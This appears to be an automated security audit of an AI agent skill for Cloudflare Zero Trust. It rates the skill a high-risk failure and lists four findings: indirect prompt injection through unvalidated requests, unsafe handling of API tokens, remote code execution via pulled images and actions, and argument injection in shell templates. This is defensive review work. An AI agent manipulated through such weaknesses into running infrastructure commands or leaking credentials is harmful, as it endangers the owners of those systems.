cloudflare-zero-trust
Fail
Audited by Gen Agent Trust Hub on Feb 14, 2026
Risk Level: HIGHCOMMAND_EXECUTIONCREDENTIALS_UNSAFEREMOTE_CODE_EXECUTIONPROMPT_INJECTION
Full Analysis
- [Indirect Prompt Injection] (HIGH): The skill manages high-privilege infrastructure actions based on untrusted user requests.\n
- Ingestion points: User requests defined in Scenarios 1-6 (test-scenarios.md).\n
- Boundary markers: Absent in the skill instructions.\n
- Capability inventory: Cloudflare API interaction, Tunnel creation, Docker/Terraform execution.\n
- Sanitization: No input validation or escaping logic present.\n- [Credentials Unsafe] (MEDIUM): Documentation (references/service-auth.md) encourages the agent to handle and provide examples of sensitive service tokens and API keys. This poses a leakage risk if the agent is manipulated.\n- [Remote Code Execution] (MEDIUM): The skill references and executes remote content, specifically the cloudflare/cloudflared Docker image and GitHub Actions (actions/checkout@v3), which could be subverted if registry/source integrity is not verified.\n- [Command Execution] (HIGH): Extensive shell command templates for cloudflared and terraform are provided. These are vulnerable to argument injection if user input is directly used in the commands.
Recommendations
- AI detected serious security threats
Audit Metadata